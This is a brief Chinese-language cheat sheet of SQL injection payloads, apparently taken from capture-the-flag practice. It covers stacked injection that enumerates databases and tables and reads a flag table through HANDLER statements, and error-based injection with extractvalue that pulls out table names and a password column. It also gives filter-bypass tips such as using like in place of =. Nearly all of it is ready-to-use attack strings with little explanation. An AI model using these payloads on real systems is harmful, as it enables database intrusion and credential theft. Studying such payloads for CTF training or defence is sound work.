SQL
load_file()函数读取一个文件并将其内容作为字符串返回 其中file_name是文件的完整路径。
堆叠注入
1';show databases;#
1';show tables;#
1';show columns from FlagHere;#
1'; HANDLER FlagHere OPEN;HANDLER FlagHere READ FIRST;HANDLER FlagHere CLOSE;#
一个知识点:
HANDLER … OPEN语句打开一个表,使其可以使用后续HANDLER … READ语句访问,该表对象未被其他会话共享,并且在会话调用HANDLER … CLOSE或会话终止之前不会关闭
读取FLAG的内容
报错注入
1'^extractvalue(1,concat(0x7e,(select(database()))))#
1'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables))))#
1'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where((table_schema)like('geek')))))#
1'^extractvalue(1,concat(0x7e,(select(left(password,30))from(geek.H4rDsq1))))#
{left(),right()}
like代替=